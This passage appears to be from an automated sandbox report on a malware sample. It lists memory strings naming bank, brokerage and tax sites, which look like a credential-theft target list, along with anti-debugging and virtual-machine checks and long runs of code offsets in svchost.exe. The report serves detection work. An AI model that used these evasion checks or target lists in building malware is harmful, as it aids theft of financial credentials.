            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8EAA2 BlockInput,0_2_00C8EAA2
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C42622
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C34CE8 mov eax, dword ptr fs:[00000030h]0_2_00C34CE8
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_014E2DF0 mov eax, dword ptr fs:[00000030h]0_2_014E2DF0
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_014E2D90 mov eax, dword ptr fs:[00000030h]0_2_014E2D90
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_014E1780 mov eax, dword ptr fs:[00000030h]0_2_014E1780
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]2_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]2_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]2_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]2_2_0360634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]2_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]2_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]2_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]2_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]2_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]2_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]2_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]2_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]2_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]2_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]2_2_0360625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]2_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]2_2_036062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]2_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]2_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]2_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]2_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]2_2_03604164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]2_2_03604164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]2_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]2_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]2_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]2_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]2_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]2_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]2_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]2_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]2_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]2_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]2_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]2_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]2_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]2_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]2_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]2_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]2_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]2_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]2_2_035280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]2_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]2_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]2_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]2_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]2_2_03538770
